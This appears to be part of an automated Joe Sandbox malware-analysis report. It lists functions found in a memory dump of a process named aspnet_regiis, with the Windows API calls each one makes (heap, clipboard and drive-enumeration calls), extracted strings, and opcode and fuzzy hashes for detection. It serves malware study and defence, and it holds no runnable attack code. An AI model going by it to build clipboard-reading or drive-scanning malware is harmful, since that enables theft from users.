RtlReAllocateHeap.NTDLL(00000000,00000000,00000001,00433212), ref: 004333E9

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 19608911a92fe9e66a4b44842a9100894de7f8a3b13ee89843ba694be8c9e91a
Instruction ID: 9dd768d601c797eced0f1fb32fab73dd23290a1807d3286c737dec57ffa6aa2c
Opcode Fuzzy Hash: 19608911a92fe9e66a4b44842a9100894de7f8a3b13ee89843ba694be8c9e91a
Instruction Fuzzy Hash: 7421D2756093009BD300AF25D94065FBBA6EFC5320F14CA2DE8D5536A0D739E9168B96

Function 00431D1D Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 00431D9D

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 70dc42085aaf31cc5f858da0208b76ae241e065b9f352727883c8acff1e3d881
Instruction ID: faaa2a28f5432dcfadff1aa72760d1e072794e38e9bb7aacaa6c4667ba833b62
Opcode Fuzzy Hash: 70dc42085aaf31cc5f858da0208b76ae241e065b9f352727883c8acff1e3d881
Instruction Fuzzy Hash: E9015E352016418FE3248F65D590B56BBA2EB8A719F38C56DC2944B796C376A813CB80

Function 0042D2E7 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 0042D31E

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: 3358f6322c01d65db6a2a4cf3f09841afe0edb6815a1b837b2a9a41a1e5be685
Instruction ID: aff2c92bc4d4b27329d6e5fa62865eb3abd2dec53eca03b05e8178db0af3ab4e
Opcode Fuzzy Hash: 3358f6322c01d65db6a2a4cf3f09841afe0edb6815a1b837b2a9a41a1e5be685
Instruction Fuzzy Hash: 15F0A0755096408FC340FF74D89A59A7FE0BF4A308F0948BDD4888B393DA39A805DB17

Function 00429A39 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00429A81

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: dca9fa13eb6518aa7513e625cedd8848dd1d49183d4641ce7667f60a636072c3
Instruction ID: c29900f15a509b6493635a3ed7949470728e2a13a015c4b09a1b3d31d1d40ce3
Opcode Fuzzy Hash: dca9fa13eb6518aa7513e625cedd8848dd1d49183d4641ce7667f60a636072c3
Instruction Fuzzy Hash: D4F01FB45187028FE310EF29D1A871ABBE0FB85304F10991CE4998B390D7B9A949CF82

Function 004282E6 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00428330

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 9b655a951d31a9f2448cd24b8c500a46a0953401fc987897c0c1ba38a5b523a6
Instruction ID: d467d3133f7384133c76753659c13c7a12f22952b1d66411aeb1b83060704726
Opcode Fuzzy Hash: 9b655a951d31a9f2448cd24b8c500a46a0953401fc987897c0c1ba38a5b523a6
Instruction Fuzzy Hash: 49F098701087028FE311DF25C5A570BBBE5BB80304F10C95CE4954B394DBB9AA49CFC2

Function 0043330F Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNELBASE ref: 0043330F

Strings

Y.[, xrefs: 00432FFB
QS, xrefs: 00433046
d)z', xrefs: 00433246

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID: DrivesLogical
String ID: d)z'$QS$Y.[
API String ID: 999431828-2110187971
Opcode ID: 2c4b6404e12a9b96dcd039e5cea7e87561d96a4f4e51accb407370de3064d5e2
Instruction ID: 59667aa5795c8fe6406a15d3fa6421a4c6f9c71bb4292e92270e6e51c95fa777
Opcode Fuzzy Hash: 2c4b6404e12a9b96dcd039e5cea7e87561d96a4f4e51accb407370de3064d5e2
Instruction Fuzzy Hash: 42A00270525110CBD7043B23FD0A1883670BB41306B61A9BBB432414B58A7508018E0D

Non-executed Functions

Function 00429BC0 Relevance: 9.1, APIs: 6, Instructions: 124clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00429BED
GetWindowLongW.USER32 ref: 00429C18
GetClipboardData.USER32 ref: 00429C28
CloseClipboard.USER32 ref: 00429D3B

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID: Clipboard$CloseDataLongOpenWindow
String ID:
API String ID: 1647500905-0
Opcode ID: ebf3928754cadb559de669f953e17727069e132b88399d4d124d64f2fc343997
Instruction ID: a16aa55f13b6d64af1caf6905559e6795c1c60601db4727199c5a264373b4f72
Opcode Fuzzy Hash: ebf3928754cadb559de669f953e17727069e132b88399d4d124d64f2fc343997
Instruction Fuzzy Hash: 7B41E370A08B818FD314EF39D548356FFE1AB42314F04CA2DC0E68BB81D379A859DB96

Function 00434661 Relevance: 7.1, Strings: 5, Instructions: 881COMMON

Download Yara Rule

Strings

%;TK, xrefs: 00434836
eRC, xrefs: 00435142
2IC, xrefs: 0043491D
%;TK, xrefs: 00434806
rTC, xrefs: 004353F4

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: %;TK$%;TK$2IC$eRC$rTC
API String ID: 0-2023983429
Opcode ID: 8c4d0dd0bb4e335af14026c10ab2b6daef9fc28c81e8a2c4d97660f2654ab88a
Instruction ID: 8646c76c3e9c543cd7cfa2cb4d0306be3efdd6bf7ba6ee5451e32e436268b484
Opcode Fuzzy Hash: 8c4d0dd0bb4e335af14026c10ab2b6daef9fc28c81e8a2c4d97660f2654ab88a
Instruction Fuzzy Hash: C962CA36609201CFC708CF29E4A065AB7F2FFC9314F19996DD49A877A1C734E945CB8A

Function 00434770 Relevance: 7.1, Strings: 5, Instructions: 844COMMON

Download Yara Rule

Strings

%;TK, xrefs: 00434836
eRC, xrefs: 00435142
2IC, xrefs: 0043491D
%;TK, xrefs: 00434806
rTC, xrefs: 004353F4

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: %;TK$%;TK$2IC$eRC$rTC
API String ID: 0-2023983429
Opcode ID: e6c72382dc6ff381ef38823e030af26c299d54f7feba665adaccc50a7d80a0b2
Instruction ID: 34a1d62e8afedcb2d2646c3ee3fa8f919e53b752d855a6416eddabd52971a3d0
Opcode Fuzzy Hash: e6c72382dc6ff381ef38823e030af26c299d54f7feba665adaccc50a7d80a0b2
Instruction Fuzzy Hash: 6652CB36609200CFD708CF29D4A0A5AB7F2FFC9314F19996DD49A877A1C734E855CB8A

Function 00411B5D Relevance: 6.7, Strings: 5, Instructions: 473COMMON

Download Yara Rule

Strings

pUTK, xrefs: 004133D6
A-Q+, xrefs: 00413204
>=, xrefs: 0041322A
pUTK, xrefs: 00413178
onih, xrefs: 00412F58

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: >=$A-Q+$onih$pUTK$pUTK
API String ID: 0-3057816515
Opcode ID: a1f3518dc4d6907dd62553a3efd01ce5fecfe3e629b692580af0fb814b53192e
Instruction ID: 59533cf914e7259a3e5c13bf49514f8814af62cbbaaddc55c6068720b5fa406b
Opcode Fuzzy Hash: a1f3518dc4d6907dd62553a3efd01ce5fecfe3e629b692580af0fb814b53192e
Instruction Fuzzy Hash: DDF157B06083418BD318CF14C490B6BBBF2FF95355F14886DE4858B3A2D779D989CB9A

Function 00434B20 Relevance: 4.4, Strings: 3, Instructions: 613COMMON

Download Yara Rule

Strings

eRC, xrefs: 00435142
|MJK, xrefs: 00434B66
rTC, xrefs: 004353F4

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: eRC$rTC$|MJK
API String ID: 0-2000110321
Opcode ID: e8d493d9cc7083a299f3e0a09b95332799d38c5ae94ca71a41086a858a494b67
Instruction ID: c553bb1d6398e655bdd8dac4bd8a7793095c62bb97b91aaec156035c35538053
Opcode Fuzzy Hash: e8d493d9cc7083a299f3e0a09b95332799d38c5ae94ca71a41086a858a494b67
Instruction Fuzzy Hash: 6512CD36609201CFD708CF29D4A066AB7E2FFC9314F09A96DE98687391C734E955CF86

Function 00433DAF Relevance: 4.1, Strings: 3, Instructions: 397COMMON

Download Yara Rule

Strings

":C, xrefs: 00433A0C
gY<S, xrefs: 004339E0
@, xrefs: 00433669

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: ":C$@$gY<S
API String ID: 0-4039707082
Opcode ID: 6c86fb9bb430f18f0bfe7ed0aa4b56a24194281bb1a658ee961372eebc24f845
Instruction ID: c59aa95933c59a739c8e697774b8ebfb49a9ef6b297764a76b028f71b340c182
Opcode Fuzzy Hash: 6c86fb9bb430f18f0bfe7ed0aa4b56a24194281bb1a658ee961372eebc24f845
Instruction Fuzzy Hash: DED143756083419FD314CF19C59072BBBE2EBCA705F14A92EE88987350C778DD0ADB8A

Function 00411199 Relevance: 1.8, Strings: 1, Instructions: 566COMMON

Download Yara Rule

Strings

onih, xrefs: 00411204

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID: AllocateHeap
String ID: onih
API String ID: 1279760036-4145997799
Opcode ID: f0ea55b18c283ca31c958ba430629de48f997c0908c745dabafc03177b01ccca
Instruction ID: 8c954cbcf73d0492fd081a8839adbe0fb51ebf1442e0e8dc1d9693bb48fdaa82
Opcode Fuzzy Hash: f0ea55b18c283ca31c958ba430629de48f997c0908c745dabafc03177b01ccca
Instruction Fuzzy Hash: 1612D472908311DBD7109F24D88176A73E5EF99354F08193EE686973A1EB38DC84CB8B

Function 0041A400 Relevance: 1.7, APIs: 1, Instructions: 242comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00438740,00000000,00000001,00438730), ref: 0041A429

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: f64e1231aef87ccf6af7af34e496503bf6dbc2264c56c27e1af9dac0c8093621
Instruction ID: ed3ca0c26924fb8313f58f028ea88dfcdcea309d91a3f8ccbb980e2dfc6bfde8
Opcode Fuzzy Hash: f64e1231aef87ccf6af7af34e496503bf6dbc2264c56c27e1af9dac0c8093621
Instruction Fuzzy Hash: 835113B06052109BD7209B24CC86BA373B5EFA5328F18452DE986CB3D0F779E894C75A

Function 00422700 Relevance: 1.6, Strings: 1, Instructions: 398COMMON

Download Yara Rule

Strings

", xrefs: 004229D8

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 3f7daec6c96696e3885f5c2d8b9b6d7a5c243ab2131458cbfa3e462702648435
Instruction ID: 4e8cb7955c538a151d1c6c5859234796db08d44d3a7ced8399a3f058463164dc
Opcode Fuzzy Hash: 3f7daec6c96696e3885f5c2d8b9b6d7a5c243ab2131458cbfa3e462702648435
Instruction Fuzzy Hash: 6AC149B2B083217BC7258E24E55076BB7D5AF84350F888A2FE49587382D7BCEC45C796

Function 00418C00 Relevance: 1.6, Strings: 1, Instructions: 391COMMON

Download Yara Rule

Strings

Bmrs, xrefs: 00418F56

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: Bmrs
API String ID: 0-2220043307
Opcode ID: aba28dc23b312c8629889755e3df5a995b8e20b2e54b8e27063423c6dc8755bc
Instruction ID: 626e7a905781cf5e3153b27d3cbaa51cedd711b552ff38660d9267233066ba15
Opcode Fuzzy Hash: aba28dc23b312c8629889755e3df5a995b8e20b2e54b8e27063423c6dc8755bc
Instruction Fuzzy Hash: 2FB1CE719043008BC724CF18C8917A7B3F1EF95364F18861EE8958B391EB78DD85C7AA

Function 00410B95 Relevance: 1.6, Strings: 1, Instructions: 334COMMON

Download Yara Rule

Strings

lx, xrefs: 00410E1D

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: lx
API String ID: 0-3595554650
Opcode ID: 5b0d96671900dfb8da1243459af1e2c7f9672e17dc29d198106878dc659f76ff
Instruction ID: 99d41ff2d2e6b22daf2bee45268baed169b128bf1315e11f152d1e7c05295f47
Opcode Fuzzy Hash: 5b0d96671900dfb8da1243459af1e2c7f9672e17dc29d198106878dc659f76ff
Instruction Fuzzy Hash: ABC128745083808BD324EF29C484B9FFBF1EF96304F14892DE5C997351E77A98858B5A

Function 0041FF23 Relevance: 1.6, Strings: 1, Instructions: 323COMMON

Download Yara Rule

Strings

2B0B8B, xrefs: 00420024

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: 2B0B8B
API String ID: 0-3594203492
Opcode ID: ae3fe04c10feea808a8ee7b30b9125075b8575fde3b53b78afe6618ff647c64e
Instruction ID: 87dbe57898fde06504e3b188ffa31b763742dfa13272a8125331c1c396921eca
Opcode Fuzzy Hash: ae3fe04c10feea808a8ee7b30b9125075b8575fde3b53b78afe6618ff647c64e
Instruction Fuzzy Hash: A1C19D716083518FC314CF29D89062BF7E2BBC9314F558A6EE89997392C779DC02CB96

Function 00409940 Relevance: 1.5, Strings: 1, Instructions: 234COMMON

Download Yara Rule

Strings

@, xrefs: 00409AB4

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 86e41fdd573f2c77ea97b072a64e95b3cb264418101b62054270d0ba596a8a81
Instruction ID: c089de14d7646bb64245ba4cd4c2f8a58595428c53dde4ba53eccf160720983d
Opcode Fuzzy Hash: 86e41fdd573f2c77ea97b072a64e95b3cb264418101b62054270d0ba596a8a81
Instruction Fuzzy Hash: 2471867150D3918BD3119F2AC09070BFFE0AF967A4F08499DE8C46B392C379E945CB9A

Function 00412367 Relevance: 1.4, Strings: 1, Instructions: 196COMMON

Download Yara Rule

Strings

xM, xrefs: 00412419

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: xM
API String ID: 0-2924665900
Opcode ID: f5652710800b0a68c3e0c4c18f040c0ff23ef9eb6731fc90fd432da870cbdef8
Instruction ID: 84becae86956912075c4f08c43772baebf82e0cc1f8a3d4f828148a7a578b939
Opcode Fuzzy Hash: f5652710800b0a68c3e0c4c18f040c0ff23ef9eb6731fc90fd432da870cbdef8
Instruction Fuzzy Hash: 197126709083848BD3B5CF14C5857DBB7E6EF89300F048D2DE98887291E7B99999CB57

Function 004186A0 Relevance: 1.4, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

|QPS, xrefs: 004188B3

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: |QPS
API String ID: 0-621468069
Opcode ID: 23b0b5655f3be91ae77da4ba8f4e049d66fea65f3cd49e3dcdaaeb1d47e65e40
Instruction ID: 35871aeb178df8561458f761d95a1951bef747746e18cfb19a3a7fa4357483d6
Opcode Fuzzy Hash: 23b0b5655f3be91ae77da4ba8f4e049d66fea65f3cd49e3dcdaaeb1d47e65e40
Instruction Fuzzy Hash: EE6123B05183419BD310DF19C49066BBBF1FF86794F108A1DF8E99B390DB78D9418B9A

Function 00412CE2 Relevance: 1.4, Strings: 1, Instructions: 181COMMON

Download Yara Rule

Strings

onih, xrefs: 00412D18

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: onih
API String ID: 0-4145997799
Opcode ID: af7ccdb1b1450c8b5a996fc0e031f56998895535806fe3ff0136f299f80acce3
Instruction ID: 7707ab0250a0cc5023ab65f5c11c67ab0f8dd374d7713762664de224cb00b08c
Opcode Fuzzy Hash: af7ccdb1b1450c8b5a996fc0e031f56998895535806fe3ff0136f299f80acce3
Instruction Fuzzy Hash: 9E51CB35618310ABC718CF14E661B6BB3E2FF89704F04892DE98597251C3B9EC61CBCA

Function 004147CF Relevance: 1.3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

Strings

/.)(, xrefs: 00414818

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: /.)(
API String ID: 0-2587180175
Opcode ID: 8a467202108252d3a037469610e6e76b27d7b8381afc4679fa91345188b919a2
Instruction ID: 59dc8c4e732b59f322d612cb587a7b6cb6d9920b254b192447bf55da004168de
Opcode Fuzzy Hash: 8a467202108252d3a037469610e6e76b27d7b8381afc4679fa91345188b919a2
Instruction Fuzzy Hash: FD1148799083918BD328DF11D4A076BB7A2BBC6304F105A2EE88627345C778D9458BCA

Function 00403A40 Relevance: .7, Instructions: 702COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4514806d94bbd0892f546e6e97d907cd1ceb4d2aaa9c7d3d3fcd5944376383de
Instruction ID: a3ee799a2a52668f70cadab07ed2f0ab167f8ce785c210a76ac9e6b172f293e1
Opcode Fuzzy Hash: 4514806d94bbd0892f546e6e97d907cd1ceb4d2aaa9c7d3d3fcd5944376383de
Instruction Fuzzy Hash: 5752BB716087418FC725CF29C08026BFBE2BF98314F188A7EE5CAA7791D739A945CB45

Function 0041F178 Relevance: .4, Instructions: 441COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73e4c717c715894491fc0121e26296cc3a19ef0e50def314c112da8f5aee08bc
Instruction ID: 318dbbe5c3c440b1d9ff2ffbc90e0d1b6799ac0d41178395f7e48066cab86664
Opcode Fuzzy Hash: 73e4c717c715894491fc0121e26296cc3a19ef0e50def314c112da8f5aee08bc
Instruction Fuzzy Hash: 23F1F0B15083818FD310CF29D4906ABBBE1AF85304F14897EF8D597392D738D94ACB56

Function 00421465 Relevance: .3, Instructions: 346COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea5483d2965f36282b100a6a75860c07ab3ac3d2b8535f027f440fde816b297e
Instruction ID: 1ea1cfdae431a8f6c6bae6a27309291cd432dd6a4841f80e9c4e2ce46143d4f5
Opcode Fuzzy Hash: ea5483d2965f36282b100a6a75860c07ab3ac3d2b8535f027f440fde816b297e
Instruction Fuzzy Hash: C4C1ACB0204B418FD724CF29D891667B7E2BF95308F448A6ED4D787AA2D738F445CB89

Function 00412691 Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f386fccd83e4483b5975780097bd55688f7d7a7ce6b51af7f885751c41eb321f
Instruction ID: abbf81b3d754f31e34f924608b492cb332a11725bcd663386c21e8c888a3debf
Opcode Fuzzy Hash: f386fccd83e4483b5975780097bd55688f7d7a7ce6b51af7f885751c41eb321f
Instruction Fuzzy Hash: 3CB1BC719083409FD724CF64C880B6BBBE5EF95314F044D2EF585972A1E7B8E894CB9A

Function 00432220 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f139de566dcf2679f5133bd349f38fd98b8eef1a412cfcea8eed6b710ed12751
Instruction ID: 3f231d7190a26e49b31212793c48f82ce648d3f1cd25ef3ec7ead9657b2bd5bf
Opcode Fuzzy Hash: f139de566dcf2679f5133bd349f38fd98b8eef1a412cfcea8eed6b710ed12751
Instruction Fuzzy Hash: 2951D2329083119BC710DF29C98075BB7E2EB99754F15992EE8C4A7351C3B8EC418BD6

Function 004137BD Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 233cd55c648f4d254ce9cecbbc777287911d262ce327d6dd6a1358df7f1ab2ff
Instruction ID: 2335975ccd580023cdb2ac1c5d1beee1d69193312933bb5fa4aa97a82008cd5b
Opcode Fuzzy Hash: 233cd55c648f4d254ce9cecbbc777287911d262ce327d6dd6a1358df7f1ab2ff
Instruction Fuzzy Hash: A93180705083028AD308EF15C48166BBBF2EFD5395F14D82EE4C983662E738D9C6CB5A

Function 0041C0AD Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7b0eccaca27b1809ea973b6372cbef4eb7e0da299170cd0f6124d2e85a8af19
Instruction ID: f7ca88c83ca6210f396225cf550bda2bc9179d4f1c3ea982e522422b10b1c278
Opcode Fuzzy Hash: f7b0eccaca27b1809ea973b6372cbef4eb7e0da299170cd0f6124d2e85a8af19
Instruction Fuzzy Hash: 914185B06483518FE724CF14C8906ABBBF2EFD6348F109A2DE4D51B390D7799541CB8A

Function 0041DB20 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d99b314886ab2986f715da611fd35a593e4ca420b23a379526670338e061fae
Instruction ID: 17f1b6aec8faf3233144ef1e4475231e9a9e169c21de215b3981dc6aa0a744d1
Opcode Fuzzy Hash: 4d99b314886ab2986f715da611fd35a593e4ca420b23a379526670338e061fae
Instruction Fuzzy Hash: 2A21FF3660C2018BC308DF10D4E0A3BB3B2EF9A314F144A2DD5C203361C779AC91CB8A

Function 0042BB10 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 25bb615b4cf8dbcf6efc7e43bd79b1e58ad27a5becd44600948a3e0d6f198aae
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: FC112933B041E40EC3128D3C9450565BFE34A93334B9D839AF4B99B2DAD7269D8A8399

Function 00422130 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42784f74bb6154e2fe65c69d3659ab9ac7e66f7ab3f39823d095af59e7ad56a8
Instruction ID: 4bd636a16873de271644ab178c6188ec72af9aea7b8ae486eb2598b424c08e08
Opcode Fuzzy Hash: 42784f74bb6154e2fe65c69d3659ab9ac7e66f7ab3f39823d095af59e7ad56a8
Instruction Fuzzy Hash: E901B5F170072167D720AE51E6C1F37F2A86F90708F18053EEA445B341DBB9EC25C699

Function 004036B0 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdae1e826ed07233793240173d781a2143bc02f72898fc35fd90d5c21f10e5e0
Instruction ID: 6d77aa9edeab2bb11eb8cceef791dc83a009289054169e8b69d627fc3cbeed38
Opcode Fuzzy Hash: cdae1e826ed07233793240173d781a2143bc02f72898fc35fd90d5c21f10e5e0
Instruction Fuzzy Hash: ABF02B7E7182090BF230DD6EA88043BF799D7D5755B145539EA81E3341D971E9028198

